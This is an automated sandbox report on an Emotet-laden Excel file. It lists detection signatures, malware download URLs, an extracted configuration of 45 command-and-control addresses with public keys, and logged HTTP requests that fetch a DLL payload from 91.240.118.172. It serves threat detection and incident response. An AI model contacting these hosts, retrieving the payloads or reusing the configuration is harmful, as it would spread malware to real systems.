Windows Analysis Report
2022-28-01_1202.xls

Overview

General Information

Sample Name: 2022-28-01_1202.xls
Analysis ID: 562524
MD5: e31371453defbbf8840b40b5bff8600a
SHA1: bf7b00bc9192d147adc9d2fa52c69fe796e55d67
SHA256: 7649a43612652c0b32353e7ae9898150f885a770db0d024d0d034c4171d5d684
Tags: SilentBuilderxls

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection

Source: http://maxtdeveloper.com/okw9yx/ Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/ Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.html4 Avira URL Cloud: Label: malware
Source: http://it-o.biz/bitrix/xoDdDe/PE3 Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/f Avira URL Cloud: Label: malware
Source: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3 Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/ Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3 Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/97v/ Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.png Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.pngPE3 Avira URL Cloud: Label: malware
Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3 Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-adm Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/ Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/ Avira URL Cloud: Label: malware
Source: http://hostfeeling.com Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com Avira URL Cloud: Label: malware
Source: http://it-o.biz/ Avira URL Cloud: Label: malware
Source: http://jurnalpjf.lan.go.id/assets/iM/ Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/ Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3 Avira URL Cloud: Label: malware
Source: https://gudangtasorichina.com/wp-content/GG01c/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.htmlv Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.htmlngs Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.htmlmshta Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.htmlWinSta0 Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3 Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/97v/PE3 Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/ Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/9 Avira URL Cloud: Label: malware
Source: http://91.240.118.172 Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/libraries/8s/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.htmlfunction Avira URL Cloud: Label: malware
Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/ Avira URL Cloud: Label: malware
Source: http://it-o.biz/bitrix/xoDdDe/ Avira URL Cloud: Label: malware
Source: https://gudangtasorichina.com/wp-content/GG01c/ Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.htmlY Avira URL Cloud: Label: malware
Source: http://totalplaytuxtla.com/sitio/DgktL3zd/ Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/libraries/8s/ Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.p Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-cont Avira URL Cloud: Label: malware
Source: http://jurnalpjf.lan.go.id/assets/iM/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.htmlB Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3 Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/ Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.htmlK Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.html Avira URL Cloud: Label: malware
Source: 15.2.rundll32.exe.220000.1.unpack Malware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
Source: 2022-28-01_1202.xls ReversingLabs: Detection: 11%
Source: hostfeeling.com Virustotal: Detection: 10%
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/ Virustotal: Detection: 12%
Source: C:\ProgramData\JooSee.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: >ystem.pdbT source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.667425212.0000000002C07000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_002A7E00 FindFirstFileW, 17_2_002A7E00

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80
Source: global traffic DNS query: name: hostfeeling.com

Networking

Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.172:80
Source: Malware configuration extractor IPs: 160.16.102.168:80
Source: Malware configuration extractor IPs: 131.100.24.231:80
Source: Malware configuration extractor IPs: 200.17.134.35:7080
Source: Malware configuration extractor IPs: 207.38.84.195:8080
Source: Malware configuration extractor IPs: 212.237.56.116:7080
Source: Malware configuration extractor IPs: 58.227.42.236:80
Source: Malware configuration extractor IPs: 104.251.214.46:8080
Source: Malware configuration extractor IPs: 158.69.222.101:443
Source: Malware configuration extractor IPs: 192.254.71.210:443
Source: Malware configuration extractor IPs: 46.55.222.11:443
Source: Malware configuration extractor IPs: 45.118.135.203:7080
Source: Malware configuration extractor IPs: 107.182.225.142:8080
Source: Malware configuration extractor IPs: 103.75.201.2:443
Source: Malware configuration extractor IPs: 104.168.155.129:8080
Source: Malware configuration extractor IPs: 195.154.133.20:443
Source: Malware configuration extractor IPs: 159.8.59.82:8080
Source: Malware configuration extractor IPs: 110.232.117.186:8080
Source: Malware configuration extractor IPs: 45.142.114.231:8080
Source: Malware configuration extractor IPs: 41.76.108.46:8080
Source: Malware configuration extractor IPs: 203.114.109.124:443
Source: Malware configuration extractor IPs: 50.116.54.215:443
Source: Malware configuration extractor IPs: 209.59.138.75:7080
Source: Malware configuration extractor IPs: 185.157.82.211:8080
Source: Malware configuration extractor IPs: 164.68.99.3:8080
Source: Malware configuration extractor IPs: 162.214.50.39:7080
Source: Malware configuration extractor IPs: 138.185.72.26:8080
Source: Malware configuration extractor IPs: 178.63.25.185:443
Source: Malware configuration extractor IPs: 51.15.4.22:443
Source: Malware configuration extractor IPs: 81.0.236.90:443
Source: Malware configuration extractor IPs: 216.158.226.206:443
Source: Malware configuration extractor IPs: 45.176.232.124:443
Source: Malware configuration extractor IPs: 162.243.175.63:443
Source: Malware configuration extractor IPs: 212.237.17.99:8080
Source: Malware configuration extractor IPs: 45.118.115.99:8080
Source: Malware configuration extractor IPs: 129.232.188.93:443
Source: Malware configuration extractor IPs: 173.214.173.220:8080
Source: Malware configuration extractor IPs: 178.79.147.66:8080
Source: Malware configuration extractor IPs: 176.104.106.96:8080
Source: Malware configuration extractor IPs: 51.38.71.0:443
Source: Malware configuration extractor IPs: 173.212.193.249:8080
Source: Malware configuration extractor IPs: 217.182.143.207:443
Source: Malware configuration extractor IPs: 212.24.98.99:8080
Source: Malware configuration extractor IPs: 159.89.230.105:443
Source: Malware configuration extractor IPs: 79.172.212.216:8080
Source: Malware configuration extractor IPs: 212.237.5.209:443
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 23:14:50 GMTServer: Apache/2.4.6 (CentOS) PHP/7.4.27X-Powered-By: PHP/7.4.27Set-Cookie: 61f478ea13105=1643411690; expires=Fri, 28-Jan-2022 23:15:50 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 23:14:50 GMTExpires: Fri, 28 Jan 2022 23:14:50 GMTContent-Disposition: attachment; filename="S2TSbn.dll"Content-Transfer-Encoding: binaryContent-Length: 548864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
Source: Joe Sandbox View ASN Name: OnlineSASFR
Source: Joe Sandbox View ASN Name: S-NET-ASPL
Source: Joe Sandbox View ASN Name: ARUBA-ASNIT
Source: Joe Sandbox View IP Address: 195.154.133.20
Source: Joe Sandbox View IP Address: 185.157.82.211
Source: Joe Sandbox View IP Address: 212.237.17.99
Source: unknown Network traffic detected: IP country count 21
Source: powershell.exe, 00000006.00000002.673143883.00000000035BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.11
Source: powershell.exe, 00000006.00000002.673143883.00000000035BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172
Source: mshta.exe, 00000004.00000002.433444835.000000000027C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.html
Source: mshta.exe, 00000004.00000003.411734628.000000000025F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.html4
Source: 2022-28-01_1202.xls.0.dr String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlB
Source: mshta.exe, 00000004.00000002.433387100.000000000021E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlK
Source: mshta.exe, 00000004.00000002.433371038.00000000001E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlWinSta0
Source: mshta.exe, 00000004.00000003.411782427.000000000027C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.428057255.000000000027C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433444835.000000000027C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlY
Source: mshta.exe, 00000004.00000003.413147395.0000000002A4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlfunction
Source: mshta.exe, 00000004.00000003.413134769.0000000002A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html
Source: mshta.exe, 00000004.00000002.433371038.00000000001E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlmshta
Source: mshta.exe, 00000004.00000002.433387100.000000000021E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlngs
Source: mshta.exe, 00000004.00000002.433387100.000000000021E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlv
Source: powershell.exe, 00000006.00000002.673143883.00000000035BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.p
Source: powershell.exe, 00000006.00000002.673143883.00000000035BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.675917527.000000001B87B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.png
Source: powershell.exe, 00000006.00000002.673143883.00000000035BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.pngPE3
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://activetraining.sytes.net/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://activetraining.sytes.net/libraries/8s/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://activetraining.sytes.net/libraries/8s/PE3
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bimesarayenovin.ir/wp-adm
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.suk
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.sukoburu-secure.com
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gardeningfilm.com/wp-cont
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com/wp-admin/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://it-o.biz/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://it-o.biz/bitrix/xoDdDe/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://it-o.biz/bitrix/xoDdDe/PE3
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id/asset
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/PE3
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://maxtdeveloper.com/okw9yx/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://totalplaytuxtla.com/sitio
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inablr.com/elenctic/f
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/
Source: powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3
Source: powershell.exe, 00000006.00000002.666941334.0000000000350000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: mshta.exe, 00000004.00000002.433703673.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411782427.000000000027C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.428057255.000000000027C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433444835.000000000027C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com
Source: rundll32.exe, 00000011.00000002.666782333.00000000001DD000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.667122057.00000000007E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168/
Source: rundll32.exe, 00000011.00000002.667077231.0000000000799000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168/r
Source: rundll32.exe, 00000011.00000002.667057361.000000000077A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168:80/qczEnNfFsrzyoNZZyTPVzxGYReoNlOZZRmqKBwLAih
